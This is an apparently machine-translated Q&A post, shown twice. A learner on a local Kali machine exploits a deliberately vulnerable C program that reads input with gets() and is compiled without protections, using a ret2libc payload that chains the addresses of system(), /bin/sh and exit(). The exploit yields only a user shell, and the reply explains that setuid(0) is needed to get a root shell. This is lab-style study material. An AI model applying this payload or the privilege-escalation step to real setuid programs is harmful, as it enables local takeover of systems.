我的缓冲区溢出漏洞利用仅打开普通用户 shell 而不是根用户 shell
My buffer overflow exploit only opens a regular user shell but not a root shell
我一直在尝试让这个非常简单的缓冲区溢出在我本地的 kali 机器上运行,经过大量的反复试验,我终于明白了它可以执行我的 shell 代码并打开一个 /bin/bash shell - 然而,它只是普通用户的 shell(即我自己的“kali”用户)而不是“root”shell。非常失望!
我在 SO 上阅读了两个类似的(较旧的)问题,并尝试了所有针对它们的建议(例如确保可执行文件由 root 拥有,设置了 +s 标志,不在 nosuid 下安装,禁用 ASLR 等)但没有任何运气。
这是易受攻击程序的源代码:
kali@kali:~/Documents/buffer-overflow$ cat vulnerable.c
#include <stdio.h>
void vulnerableFunction()
{
char buffer[32];
printf("What's your name? ");
gets(buffer);
printf("Hello, %s!\n", buffer);
}
int main()
{
vulnerableFunction();
return 0;
}
以下是我的编译方式:
kali@kali:~/Documents/buffer-overflow$ gcc vulnerable.c -m32 -o vulnerable-x86 -fno-stack-protector -z execstack -no-pie
vulnerable.c: In function ‘vulnerableFunction’:
vulnerable.c:8:5: warning: implicit declaration of function ‘gets’; did you mean ‘fgets’? [-Wimplicit-function-declaration]
8 | gets(buffer);
| ^~~~
| fgets
/usr/bin/ld: /tmp/ccAaIkz1.o: in function `vulnerableFunction':
vulnerable.c:(.text+0x2c): warning: the `gets' function is dangerous and should not be used.
以下是可执行文件的权限:
kali@kali:~/Documents/buffer-overflow$ sudo chown root:root ./vulnerable-x86
kali@kali:~/Documents/buffer-overflow$ sudo chmod +s ./vulnerable-x86
kali@kali:~/Documents/buffer-overflow$ ll ./vulnerable-x86
-rwsr-sr-x 1 root root 15408 Oct 5 13:51 ./vulnerable-x86
这里禁用了 ASLR (afaik):
kali@kali:~/Documents/buffer-overflow$ cat /proc/sys/kernel/randomize_va_space
0
这是有效负载以及我如何注入它(3 个内存地址指向 system()、/bin/sh 和 libc 中的 exit() 函数):
kali@kali:~/Documents/buffer-overflow$ python -c "import struct; print ('A' * 44) + struct.pack('<I', 0xf7e07070) + struct.pack('<I', 0xf7df99c0) + struct.pack('<I', 0xf7f4e33c)" > payload
kali@kali:~/Documents/buffer-overflow$ cat payload - | ./vulnerable-x86
这是结果(“whoami”和“echo $0”都是我手动输入的命令):
What's your name? Hello, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApp������<���!
whoami
kali
echo [=17=]
/bin/sh
这似乎是一个新的 shell 被成功生成(因为我需要输入 exit 两次,才能恢复正常 shell)但它是 不是根。
仅供参考 - 这些是我的 nosuid 坐骑:
kali@kali:/home$ sudo cat /proc/mounts | grep nosuid
sysfs /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
udev /dev devtmpfs rw,nosuid,noexec,relatime,size=4044272k,nr_inodes=1011068,mode=755 0 0
devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000 0 0
tmpfs /run tmpfs rw,nosuid,nodev,noexec,relatime,size=815504k,mode=755 0 0
securityfs /sys/kernel/security securityfs rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev 0 0
tmpfs /run/lock tmpfs rw,nosuid,nodev,noexec,relatime,size=5120k 0 0
tmpfs /sys/fs/cgroup tmpfs ro,nosuid,nodev,noexec,size=4096k,nr_inodes=1024,mode=755 0 0
cgroup2 /sys/fs/cgroup/unified cgroup2 rw,nosuid,nodev,noexec,relatime,nsdelegate 0 0
cgroup /sys/fs/cgroup/systemd cgroup rw,nosuid,nodev,noexec,relatime,xattr,name=systemd 0 0
pstore /sys/fs/pstore pstore rw,nosuid,nodev,noexec,relatime 0 0
none /sys/fs/bpf bpf rw,nosuid,nodev,noexec,relatime,mode=700 0 0
cgroup /sys/fs/cgroup/freezer cgroup rw,nosuid,nodev,noexec,relatime,freezer 0 0
cgroup /sys/fs/cgroup/devices cgroup rw,nosuid,nodev,noexec,relatime,devices 0 0
cgroup /sys/fs/cgroup/rdma cgroup rw,nosuid,nodev,noexec,relatime,rdma 0 0
cgroup /sys/fs/cgroup/cpu,cpuacct cgroup rw,nosuid,nodev,noexec,relatime,cpu,cpuacct 0 0
cgroup /sys/fs/cgroup/net_cls,net_prio cgroup rw,nosuid,nodev,noexec,relatime,net_cls,net_prio 0 0
cgroup /sys/fs/cgroup/cpuset cgroup rw,nosuid,nodev,noexec,relatime,cpuset 0 0
cgroup /sys/fs/cgroup/blkio cgroup rw,nosuid,nodev,noexec,relatime,blkio 0 0
cgroup /sys/fs/cgroup/memory cgroup rw,nosuid,nodev,noexec,relatime,memory 0 0
cgroup /sys/fs/cgroup/perf_event cgroup rw,nosuid,nodev,noexec,relatime,perf_event 0 0
cgroup /sys/fs/cgroup/pids cgroup rw,nosuid,nodev,noexec,relatime,pids 0 0
mqueue /dev/mqueue mqueue rw,nosuid,nodev,noexec,relatime 0 0
tracefs /sys/kernel/tracing tracefs rw,nosuid,nodev,noexec,relatime 0 0
debugfs /sys/kernel/debug debugfs rw,nosuid,nodev,noexec,relatime 0 0
binfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /run/user/1000 tmpfs rw,nosuid,nodev,relatime,size=815500k,nr_inodes=203875,mode=700,uid=1000,gid=1000 0 0
gvfsd-fuse /run/user/1000/gvfs fuse.gvfsd-fuse rw,nosuid,nodev,relatime,user_id=1000,group_id=1000 0 0
任何想法都将非常受欢迎,因为我觉得几个小时前我已经 运行 无法尝试 :(
谢谢!
当您的程序的可执行文件具有 setuid 位时,该程序 运行 具有原始用户的 UID 和文件所有者的 EUID。这意味着,在程序执行 setuid(0) 之前,它不会获得实际的 root 权限(UID=0),并且将 运行 作为普通用户。特别是,它的子进程将不会 运行 作为 root。
因此,您必须将易受攻击的程序修改为 运行 setuid(0),或者将等效的系统调用添加到 shell 代码负载,以获取根 shell.
我一直在尝试让这个非常简单的缓冲区溢出在我本地的 kali 机器上运行,经过大量的反复试验,我终于明白了它可以执行我的 shell 代码并打开一个 /bin/bash shell - 然而,它只是普通用户的 shell(即我自己的“kali”用户)而不是“root”shell。非常失望!
我在 SO 上阅读了两个类似的(较旧的)问题,并尝试了所有针对它们的建议(例如确保可执行文件由 root 拥有,设置了 +s 标志,不在 nosuid 下安装,禁用 ASLR 等)但没有任何运气。
这是易受攻击程序的源代码:
kali@kali:~/Documents/buffer-overflow$ cat vulnerable.c
#include <stdio.h>
void vulnerableFunction()
{
char buffer[32];
printf("What's your name? ");
gets(buffer);
printf("Hello, %s!\n", buffer);
}
int main()
{
vulnerableFunction();
return 0;
}
以下是我的编译方式:
kali@kali:~/Documents/buffer-overflow$ gcc vulnerable.c -m32 -o vulnerable-x86 -fno-stack-protector -z execstack -no-pie
vulnerable.c: In function ‘vulnerableFunction’:
vulnerable.c:8:5: warning: implicit declaration of function ‘gets’; did you mean ‘fgets’? [-Wimplicit-function-declaration]
8 | gets(buffer);
| ^~~~
| fgets
/usr/bin/ld: /tmp/ccAaIkz1.o: in function `vulnerableFunction':
vulnerable.c:(.text+0x2c): warning: the `gets' function is dangerous and should not be used.
以下是可执行文件的权限:
kali@kali:~/Documents/buffer-overflow$ sudo chown root:root ./vulnerable-x86
kali@kali:~/Documents/buffer-overflow$ sudo chmod +s ./vulnerable-x86
kali@kali:~/Documents/buffer-overflow$ ll ./vulnerable-x86
-rwsr-sr-x 1 root root 15408 Oct 5 13:51 ./vulnerable-x86
这里禁用了 ASLR (afaik):
kali@kali:~/Documents/buffer-overflow$ cat /proc/sys/kernel/randomize_va_space
0
这是有效负载以及我如何注入它(3 个内存地址指向 system()、/bin/sh 和 libc 中的 exit() 函数):
kali@kali:~/Documents/buffer-overflow$ python -c "import struct; print ('A' * 44) + struct.pack('<I', 0xf7e07070) + struct.pack('<I', 0xf7df99c0) + struct.pack('<I', 0xf7f4e33c)" > payload
kali@kali:~/Documents/buffer-overflow$ cat payload - | ./vulnerable-x86
这是结果(“whoami”和“echo $0”都是我手动输入的命令):
What's your name? Hello, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApp������<���!
whoami
kali
echo [=17=]
/bin/sh
这似乎是一个新的 shell 被成功生成(因为我需要输入 exit 两次,才能恢复正常 shell)但它是 不是根。
仅供参考 - 这些是我的 nosuid 坐骑:
kali@kali:/home$ sudo cat /proc/mounts | grep nosuid
sysfs /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
udev /dev devtmpfs rw,nosuid,noexec,relatime,size=4044272k,nr_inodes=1011068,mode=755 0 0
devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000 0 0
tmpfs /run tmpfs rw,nosuid,nodev,noexec,relatime,size=815504k,mode=755 0 0
securityfs /sys/kernel/security securityfs rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev 0 0
tmpfs /run/lock tmpfs rw,nosuid,nodev,noexec,relatime,size=5120k 0 0
tmpfs /sys/fs/cgroup tmpfs ro,nosuid,nodev,noexec,size=4096k,nr_inodes=1024,mode=755 0 0
cgroup2 /sys/fs/cgroup/unified cgroup2 rw,nosuid,nodev,noexec,relatime,nsdelegate 0 0
cgroup /sys/fs/cgroup/systemd cgroup rw,nosuid,nodev,noexec,relatime,xattr,name=systemd 0 0
pstore /sys/fs/pstore pstore rw,nosuid,nodev,noexec,relatime 0 0
none /sys/fs/bpf bpf rw,nosuid,nodev,noexec,relatime,mode=700 0 0
cgroup /sys/fs/cgroup/freezer cgroup rw,nosuid,nodev,noexec,relatime,freezer 0 0
cgroup /sys/fs/cgroup/devices cgroup rw,nosuid,nodev,noexec,relatime,devices 0 0
cgroup /sys/fs/cgroup/rdma cgroup rw,nosuid,nodev,noexec,relatime,rdma 0 0
cgroup /sys/fs/cgroup/cpu,cpuacct cgroup rw,nosuid,nodev,noexec,relatime,cpu,cpuacct 0 0
cgroup /sys/fs/cgroup/net_cls,net_prio cgroup rw,nosuid,nodev,noexec,relatime,net_cls,net_prio 0 0
cgroup /sys/fs/cgroup/cpuset cgroup rw,nosuid,nodev,noexec,relatime,cpuset 0 0
cgroup /sys/fs/cgroup/blkio cgroup rw,nosuid,nodev,noexec,relatime,blkio 0 0
cgroup /sys/fs/cgroup/memory cgroup rw,nosuid,nodev,noexec,relatime,memory 0 0
cgroup /sys/fs/cgroup/perf_event cgroup rw,nosuid,nodev,noexec,relatime,perf_event 0 0
cgroup /sys/fs/cgroup/pids cgroup rw,nosuid,nodev,noexec,relatime,pids 0 0
mqueue /dev/mqueue mqueue rw,nosuid,nodev,noexec,relatime 0 0
tracefs /sys/kernel/tracing tracefs rw,nosuid,nodev,noexec,relatime 0 0
debugfs /sys/kernel/debug debugfs rw,nosuid,nodev,noexec,relatime 0 0
binfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /run/user/1000 tmpfs rw,nosuid,nodev,relatime,size=815500k,nr_inodes=203875,mode=700,uid=1000,gid=1000 0 0
gvfsd-fuse /run/user/1000/gvfs fuse.gvfsd-fuse rw,nosuid,nodev,relatime,user_id=1000,group_id=1000 0 0
任何想法都将非常受欢迎,因为我觉得几个小时前我已经 运行 无法尝试 :(
谢谢!
当您的程序的可执行文件具有 setuid 位时,该程序 运行 具有原始用户的 UID 和文件所有者的 EUID。这意味着,在程序执行 setuid(0) 之前,它不会获得实际的 root 权限(UID=0),并且将 运行 作为普通用户。特别是,它的子进程将不会 运行 作为 root。
因此,您必须将易受攻击的程序修改为 运行 setuid(0),或者将等效的系统调用添加到 shell 代码负载,以获取根 shell.